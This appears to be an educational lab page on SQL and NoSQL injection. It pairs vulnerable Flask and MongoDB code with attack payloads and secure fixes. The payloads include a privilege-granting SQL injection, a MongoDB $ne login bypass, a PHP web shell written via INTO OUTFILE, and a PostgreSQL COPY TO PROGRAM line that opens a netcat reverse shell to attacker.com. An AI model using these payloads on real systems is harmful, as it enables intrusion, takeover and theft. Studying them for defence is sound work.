SQL/NoSQL Injection Exploitation Lab

Privilege Escalation

SQL Injection

                            # Vulnerable Flask endpoint

                            @app.route('/user/<int:user_id>')

                            def get_user(user_id):

                                query = f"SELECT * FROM users WHERE id = {user_id}"

                                result = db.execute(query)

                                return jsonify(result.fetchall())

                            # Attack payload:

                            /user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--

NoSQL Injection

                            // Vulnerable MongoDB query

                            db.users.find({

                                username: req.body.username,

                                password: req.body.password

                            });

                            // Attack payload (JSON):

                            {

                                "username": {"$ne": null},

                                "password": {"$ne": null}

                            }

Command Execution

MySQL Command Execution

                            -- Enable command execution

                            SELECT * FROM users WHERE id = 1;

                            SELECT sys_exec('whoami'); --

                            -- Writing web shell

                            SELECT '<?php system($_GET["cmd"]); ?>'

                            INTO OUTFILE '/var/www/html/shell.php'; --

PostgreSQL Exploitation

                            # Vulnerable Flask code

                            @app.route('/search')

                            def search():

                                query = request.args.get('q')

                                sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"

                                return execute_query(sql)

                            # Attack payload:

                            /search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; --

Secure Mitigation Strategies

SQLAlchemy ORM

                            # SECURE: Using SQLAlchemy ORM

                            @app.route('/user/<int:user_id>')

                            def get_user_secure(user_id):

                                user = User.query.filter_by(id=user_id).first()

                                if user:

                                    return jsonify({

                                        'id': user.id,

                                        'username': user.username

                                    })

                                return jsonify({'error': 'User not found'}), 404

NoSQL Injection Prevention

                            # SECURE: NoSQL injection prevention

                            def authenticate_user_secure(username, password):

                                if not isinstance(username, str):

                                    return None

                                username = re.escape(username)

                                user = db.users.find_one({

                                    'username': username,

                                    'password': hash_password(password)

                                })

                                return user